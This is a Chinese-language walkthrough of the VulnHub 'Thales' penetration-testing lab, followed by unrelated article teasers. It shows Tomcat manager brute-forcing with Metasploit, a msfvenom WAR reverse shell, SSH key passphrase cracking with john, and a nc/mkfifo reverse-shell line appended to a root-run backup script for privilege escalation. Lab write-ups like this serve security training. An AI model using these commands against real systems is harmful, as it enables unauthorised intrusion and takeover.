当前位置: 首页 > news >正文

vulnhub靶场之Thales

news 2025/11/15 7:01:19

一.环境搭建

1.靶场描述

Description : Open your eyes and change your perspective
includes 2 flags:user.txt and root.txt.
Telegram: @machineboy141 (for any hint)
This works better with VIrtualBox rathe than VMware

2.靶场地址

https://www.vulnhub.com/entry/thales-1,749/
 

 

image-20240129163223146
 

3.启动靶场
 

Thales靶机在VMware运行会出现bug,所以我们在VirtualBox运行。
 

 

image-20240129163328402
 

虚拟机开启之后界面如上,我们不知道ip,需要自己探活,因为我们在VirtualBox运行所以网段发生了变化,网段知道:192.168.1.0/24
 

二.渗透测试
 

1.目标
 

目标就是我们搭建的靶场,靶场IP为:192.168.1.0/24
 

2.信息收集
 

(1)寻找靶场真实ip
 

nmap -sP 192.168.1.0/24
 

 

 

image-20240129163940132
 

arp-scan -l
 

 

 

image-20240129164229619
 

靶场真实ip地址为192.168.1.13
 

(2)探测端口及服务
 

nmap -p- -sV 192.168.1.13
 

 

 

image-20240129164045121
 

发现开启了22端口,OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
发现开启了8080端口,Apache Tomcat 9.0.52
 

 

(3)web指纹识别
 

whatweb -v 192.168.1.13:8080
 

 

 

image-20240129164342897
 

3.渗透测试
 

(1)访问web服务
 

http://192.168.1.13:8080
 

 

 

image-20240129164445794
 

我们可以看到是Tomcat
 

(2)扫描web服务
 

1)棱洞3.0指纹识别
 

./EHole_linux_amd64 finger -u http://192.168.1.13:8080
 

 

 

image-20240129164921542
 

2)nikto扫描网站结构
 

nikto -h http://192.168.1.13:8080
 

 

3)dirsearch目录扫描
 

dirsearch -u 192.168.1.13:8080 -e * -x 403 --random-agent
 

 

我们扫描到一个登录页面
 

http://192.168.1.13:8080/manager
 

 

 

image-20240129165606671
 

目前,我们掌握的信息是一个tomcat框架和一个登录页面,因为tomcat 有管理登录页面,于是尝试爆破
 

(3)渗透测试
 

1)msf爆破
 

search login tomcat
 

 

 

image-20240129170544353
 

show options
 

 

set RHOSTS 192.168.1.13
 

 

 

image-20240129170723929
 

爆破出来一个用户名和密码
 

 

image-20240129170810334
 

tomcat:role1
 

2)登录
 

我们可以看到登录成功
 

 

image-20240129170852364
 

3)反弹shell
 

我们可以看到/shell和上传页面,那么我们进行shell,在 web 应用程序部署界面尝试在上传 war 包反弹 shell
 

 

image-20240129171145361
 

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.9 LPORT=666666 -f war -o MS02423.war
 

 

 

image-20240129172804028
 

我们进行上传
 

 

image-20240129172724391
 

上传成功后,在应用程序列表中看到已成功部署了 war 后门,点击访问后反弹
 

 

image-20240129172826998
 

我们可以看到反弹成功
 

我们进行提权,发现需要密码,我们进行查找
 

 

image-20240129173210637
 

4)执行脚本
 

一般情况下,我们首先去home目录下查看,然后在去/var/www/html/目录下查看有没有什么线索,我们看到了thales命令,我们进行查看
 

 

image-20240130161433886
 

我们看到了两个txt文件,模式里面提示我们,一个flag在user.txt,一个在root.txt里面,那么我们进行查看user.txt文件,但是需要thales权限,我们查看notes.txt文件,notes.txt 中告诉我们有一个备用脚本在 /usr/local/bin/backup.sh
 

includes 2 flags:user.txt and root.txt.
 

 

 

image-20240130161558059
 

 

image-20240130161920839
 

我们去执行这个脚本,但是执行之后却发现没有如何变化
 

 

5)ssh 私钥文件
 

我们在thales目录下发现了隐藏的.ssh文件,我们进行查看
 

 

image-20240130162530044
 

这样看太难受了,我们进行交互模式进行查看
 

 

image-20240130162852020
 

我们可以看到公钥,我们进行查看
 

 

我们把它保存下来,用john进行爆破
 

6)john爆破
 

将私钥文件保存到攻击机,利用 ssh2john 将私钥转化为 john 能处理的 SHA 加密的文件,然后进行爆破,得到密码为 vodka06
 

 

image-20240130170943990
 

 

image-20240130171014530
 

 

image-20240130171045172
 

7)查看user.txt文件
 

我们进行登录thales用户名
 

 

image-20240130171432515
 

我们获取到第一个flag,还有一个flag在root.txt里面,我们进行提权
 

8)提权
 

之前我们看到的那个脚本还没有查看内容,现在我们查看一下那个备份文件的代码
 

 

image-20240130171752726
 

是一个shell文件,并且是能运行命令的,我们是可以编辑的,并且是root用户运行的,我们插入一串反弹shell的命令
 

 

image-20240130171844539
 

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.9 5555 >/tmp/f" >> backup.sh
 

 

 

image-20240130172619811
 

等一会可以看到反弹成功,我们查看flag即可
 

 

image-20240130172935974
 

三.相关资源
 

1.靶场下载地址
 

2.nmap
 

3.arp-scan
 

4.masscan
 

5.[ 常用工具篇 ] 渗透神器 whatweb 安装使用详解
 

6.[ 渗透工具篇 ] EHole(棱洞)3.0安装部署及详解(linux & win)
 

7.nikto工具的使用
 

8.dirsearch目录扫描
 

9.msf工具使用
 

10.ssh私钥文件
 

11.john爆破密码
 

12.反弹shell














相关文章:
















vulnhub靶场之Thales




一.环境搭建 
1.靶场描述 
Description : Open your eyes and change your perspective
includes 2 flags:user.txt and root.txt.
Telegram: machineboy141 (for any hint)
This works better with VIrtualBox rathe than VMware 2.靶场地址 
https://www.vulnhub.com/entry/t…...






编程日记
2024/2/5 1:51:53



















Qt之使用Qt内置图标




一效果 二.原理 
Qt内置图标封装在QStyle中,共七十多个图标,可以直接拿来用,能应付不少简单程序需求,不用自己去找图标并添加到资源文件了。 下面是内置图标的枚举定义:     
enum StandardPixmap {SP_TitleBarMenuButton,SP_TitleBarMinButton,SP_TitleBarMaxButton,SP_T…...






编程日记
2024/2/5 1:49:51



















《计算机网络简易速速上手小册》第10章:未来网络技术趋势(2024 最新版)




文章目录 10.1 边缘计算与网络设计 - 未来网络的速度与激情10.1.1 基础知识10.1.2 重点案例:使用 Python 实现边缘计算的实时视频分析准备工作Python 脚本示例 10.1.3 拓展案例1:智能交通系统Python 脚本示例 - 边缘计算设备上的交通流量分析 10.1.4 拓展…...






编程日记
2024/2/5 1:48:50



















Vue引入Axios




1.命令安装axios和vue-axios npm install axios --save
npm install vue-axios --save 2.package.json查看版本 3.在main.js中引用 import axios from axios;
import VueAxios from vue-axios;
Vue.use(VueAxios,axios) 4.如何使用 (初始化方法) 将下列代…...






编程日记
2024/2/5 1:46:48



















【git 本地管理版本及与github合并】 Init Push Pull操作解决方案




文章目录 创建本地仓库,并与远程仓库链接更新本地仓库并使用Push推送到远程仓库 1. 几种基础命令介绍:2. git push操作流程   .gitignore删除本地仓库,断开本地与远程的链接设置用于提交commit的用户名,邮箱,以便githu…...






编程日记
2024/2/5 1:43:45



















JavaSE-项目小结-IP归属地查询(本地IP地址库)




一、项目介绍 1. 背景 IP地址是网络通信中的重要标识,通过分析IP地址的归属地信息,可以帮助我们了解访问来源、用户行为和网络安全等关键信息。例如应用于网站访问日志分析:通过分析访问日志中的IP地址,了解网站访问者的地理位置分…...






编程日记
2024/2/5 1:37:38



















使用最大边界相关算法处理文章自动摘要




一、需求背景 对于博客或者文章来说,摘要是普遍性的需求。但是我们不可能让作者自己手动填写摘要或者直接暴力截取文章的部分段落作为摘要,这样既不符合逻辑又不具有代表性,那么,是否有相关的算法或者数学理论能够完成这个需求呢&…...






编程日记
2024/2/5 1:32:32



















ref和reactive, toRefs的使用




看尤雨溪说:为什么Vue3 中应该使用 Ref 而不是 Reactive? toRefs 
import { ref, toRefs } from vue;// 定义一个响应式对象
const state  ref({count: 0,name: Vue
});// 使用toRefs转换为响应式引用对象
const reactiveState  toRefs(state);// 现在你…...






编程日记
2024/2/5 1:30:30



















从源代码看Chrome 版本号




一直以来都是用Chrome 浏览器,但是看到Chrome 点分4 组数据的表达方式,总是感觉怪怪的,遂深入源代码了解她的版本号具体表示的内容 
chrome 浏览器中显示的版本号 源代码中的版本号标识 
版本号文件位于 chrome/VERSION , 看到源代…...






编程日记
2024/2/5 1:26:27



















Vue 图片加载失败处理




Vue 图片加载失败处理 
很多人会使用 error 方法在图片加载 失败时替换img.src 的方式 
但是这种方式在默认图片加载失败时,error会出现死循环,所以我使用了error  v-if的方式。 
<template><div><!-- 正常时显示 --><img v-if&quo…...






编程日记
2024/2/5 1:25:26



















Quartus IP学习之ISSP(In-System Sources  Probes)




一、ISSP IP概要&#xff1a; 
ISSP&#xff1a;In-System Sources & Probes Intel FPGA IP 
作用&#xff1a; 
分为In-System Sources与In-System Probesn-System Sources&#xff0c;输入端&#xff0c;等价于拨码开关&#xff0c;通过输入板载FPGA上的拨码开关状态改变…...






编程日记
2024/2/5 1:20:19



















Vue组件通信讲解[父子组件通信]




Vue组件通信讲解 
在Vue中&#xff0c;父子组件之间的通信可以通过props和emit来实现。props用于从父组件向子组件传递数据&#xff0c;而$emit用于从子组件向父组件触发事件。 
以下是一个包含子传父和父传子通信的Vue案例解决方案&#xff1a; 
父组件&#xff1a;Parent.vue…...






编程日记
2024/2/5 1:18:17



















Qt应用开发(安卓篇)——调用ioctl、socket等C函数




一、前言 在 Qt for Android 中没办法像在嵌入式linux中一样直接使用 ioctl 等底层函数&#xff0c;这是因为因为 Android 平台的安全性和权限限制。 在 Android 中&#xff0c;访问设备硬件和系统资源需要特定的权限&#xff0c;并且需要通过 Android 系统提供的 API 来进行。…...






编程日记
2024/2/5 1:17:16



















centos 安装docker CE




centos 安装docker CE 
0. 参考 
1. 安装需要的包 
sudo yum install -y yum-utils \device-mapper-persistent-data \lvm22. 添加仓库 
sudo yum-config-manager \--add-repo \https://download.docker.com/linux/centos/docker-ce.repo3. 安装docker 
sudo yum install docke…...






编程日记
2024/2/5 1:12:11



















某赛通电子文档安全管理系统 UploadFileList 任意文件读取漏洞复现




0x01 产品简介 
某赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能…...






编程日记
2024/2/5 1:11:09



















Kafka运维相关知识




目录 
一、基本概念 
二、技术特性 
三、设计思想 
四、运维建议 一、基本概念 Apache kafka 是一个分布式的基于push-subscribe的消息系统&#xff0c;它具备快速、可扩展、可持久化的特点。它的最大的特性就是可以实时的处理大量数据以满足各种需求场景&#xff1a;比如基于h…...






编程日记
2024/2/5 1:06:05



















鸿蒙Native项目生产动态库(.so) 和静态库(.a)




通过 DevEco Studio 创建Native项目&#xff0c;我的版本为&#xff1a;Build Version: 3.1.0.501, built on June 20, 2023 
CMakeLists.txt 文件中默认生成的是动态库&#xff0c;该命令为&#xff1a;add_library(entry SHARED hello.cpp) 
通过Sutdio的操作 Build -> Bu…...






编程日记
2024/2/5 1:05:04



















B站课程评分




Spring6 
https://www.bilibili.com/video/BV1Ft4y1g7Fb/  评价: 推荐一看 配套文档优秀, 老师口齿清晰, 条理不错. 
mybatis 
https://www.bilibili.com/video/BV1JP4y1Z73S/?spm_id_from333.337.search-card.all.click  评价: 推荐一看 配套文档优秀, 老师口齿清晰, 条理不错…...






编程日记
2024/2/5 1:04:03



















【C++】拷贝构造函数和赋值运算符重载详解




目录 拷贝构造函数 
概念 
特征 
赋值运算符重载 
运算符重载 
赋值运算符重载 
​编辑前置和后置重载 ⭐拷贝构造函数 
⭐概念 
拷贝构造函数&#xff1a;只有单个形参&#xff0c;该形参是对本类类型对象的引用(一般常用const修饰)&#xff0c;在用已存 在的类类型对象创建新…...






编程日记
2024/2/5 1:02:00



















BUUCTF-Real-[ThinkPHP]5-Rce




1、ThinkPHP检测工具 
https://github.com/anx0ing/thinkphp_scan 漏洞检测 通过漏洞检测&#xff0c;我们发现存在rce漏洞&#xff01; 
2、漏洞利用 
----
[!] Name: Thinkphp5 5.0.22/5.1.29 Remote Code Execution VulnerabilityScript: thinkphp5022_5129.pyUrl: http://n…...






编程日记
2024/2/5 0:59:58





















1.3 VSCode安装与环境配置




进入网址Visual Studio Code - Code Editing. Redefined下载.deb文件&#xff0c;然后打开终端&#xff0c;进入下载文件夹&#xff0c;键入命令 
sudo dpkg -i code_1.100.3-1748872405_amd64.deb  
在终端键入命令code即启动vscode 需要安装插件列表 
1.Chinese简化 
2.ros 
…...






编程新知
2025/11/8 4:55:33



















[Java恶补day16] 238.除自身以外数组的乘积




给你一个整数数组 nums&#xff0c;返回 数组 answer &#xff0c;其中 answer[i] 等于 nums 中除 nums[i] 之外其余各元素的乘积 。 题目数据 保证 数组 nums之中任意元素的全部前缀元素和后缀的乘积都在 32 位 整数范围内。 请 不要使用除法&#xff0c;且在 O(n) 时间复杂度…...






编程新知
2025/10/3 13:53:38



















华为云Flexus+DeepSeek征文|DeepSeek-V3/R1 商用服务开通全流程与本地部署搭建




华为云FlexusDeepSeek征文&#xff5c;DeepSeek-V3/R1 商用服务开通全流程与本地部署搭建 
前言 如今大模型其性能出色&#xff0c;华为云 ModelArts Studio_MaaS大模型即服务平台华为云内置了大模型&#xff0c;能助力我们轻松驾驭 DeepSeek-V3/R1&#xff0c;本文中将分享如何…...






编程新知
2025/11/12 5:26:42



















USB Over IP专用硬件的5个特点




USB over IP技术通过将USB协议数据封装在标准TCP/IP网络数据包中&#xff0c;从根本上改变了USB连接。这允许客户端通过局域网或广域网远程访问和控制物理连接到服务器的USB设备&#xff08;如专用硬件设备&#xff09;&#xff0c;从而消除了直接物理连接的需要。USB over IP的…...






编程新知
2025/11/12 9:56:17



















用机器学习破解新能源领域的“弃风”难题




音乐发烧友深有体会&#xff0c;玩音乐的本质就是玩电网。火电声音偏暖&#xff0c;水电偏冷&#xff0c;风电偏空旷。至于太阳能发的电&#xff0c;则略显朦胧和单薄。 不知你是否有感觉&#xff0c;近两年家里的音响声音越来越冷&#xff0c;听起来越来越单薄&#xff1f; 
—…...






编程新知
2025/11/12 9:58:11



















论文笔记——相干体技术在裂缝预测中的应用研究




目录 相关地震知识补充地震数据的认识地震几何属性 相干体算法定义基本原理第一代相干体技术&#xff1a;基于互相关的相干体技术&#xff08;Correlation&#xff09;第二代相干体技术&#xff1a;基于相似的相干体技术&#xff08;Semblance&#xff09;基于多道相似的相干体…...






编程新知
2025/11/12 11:28:04



















MyBatis中关于缓存的理解




MyBatis缓存 MyBatis系统当中默认定义两级缓存&#xff1a;一级缓存、二级缓存 默认情况下&#xff0c;只有一级缓存开启&#xff08;sqlSession级别的缓存&#xff09;二级缓存需要手动开启配置&#xff0c;需要局域namespace级别的缓存  
一级缓存&#xff08;本地缓存&#…...






编程新知
2025/11/15 2:17:26



















VisualXML全新升级 | 新增数据库编辑功能




VisualXML是一个功能强大的网络总线设计工具&#xff0c;专注于简化汽车电子系统中复杂的网络数据设计操作。它支持多种主流总线网络格式的数据编辑&#xff08;如DBC、LDF、ARXML、HEX等&#xff09;&#xff0c;并能够基于Excel表格的方式生成和转换多种数据库文件。由此&…...






编程新知
2025/11/13 18:56:47



















自然语言处理——文本分类




文本分类 传统机器学习方法文本表示向量空间模型 特征选择文档频率互信息信息增益&#xff08;IG&#xff09; 分类器设计贝叶斯理论&#xff1a;线性判别函数 文本分类性能评估P-R曲线ROC曲线 将文本文档或句子分类为预定义的类或类别&#xff0c; 有单标签多类别文本分类和多…...






编程新知
2025/11/9 10:41:11



















SQL进阶之旅 Day 22:批处理与游标优化




【SQL进阶之旅 Day 22】批处理与游标优化 文章简述&#xff08;300字左右&#xff09; 
在数据库开发中&#xff0c;面对大量数据的处理任务时&#xff0c;单条SQL语句往往无法满足性能需求。本篇文章聚焦“批处理与游标优化”&#xff0c;深入探讨如何通过批量操作和游标技术提…...






编程新知
2025/9/29 3:08:51